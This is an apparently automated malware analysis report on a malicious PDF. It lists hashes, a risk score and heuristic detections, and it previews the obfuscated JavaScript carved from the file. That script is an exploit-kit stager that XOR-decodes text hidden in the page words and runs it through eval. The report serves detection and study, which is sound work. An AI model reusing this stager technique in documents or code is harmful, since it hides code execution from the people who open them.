Malicious PDF — malware analysis report

Static analysis result for SHA-256 873b9be7780e8696…

MALICIOUS

PDF

5.6 KB Authoring application: Jidagelageno (via 2b715Ylojoppekaxopqi) First seen: 2013-02-25
MD5: 8dd4e23deaa961dd6a9112d99415401e SHA-1: 9f02586494d38a46dbefb3759f71bf98a237c441 SHA-256: 873b9be7780e869663027504262f91157c1ca1cb307f0e35e3986a232b5e8016
86 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0xF52 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
var rM='';
var n=String("leng"+"th");
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
var yL=/[q4\$9LR]/g;
var lS="pro"+"tot"+"ype";
var yR=new String("eva"+"l");
var cZ="rep"+"lac"+"e";
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


xQN=xQN[cZ](yL, rM);

var rG=this;
cH=5603;cH++;
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
var kN=0;
;


var bCD=new hE(rG,xQN);
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;

Open this report in the interactive analyzer, or submit your own file for analysis.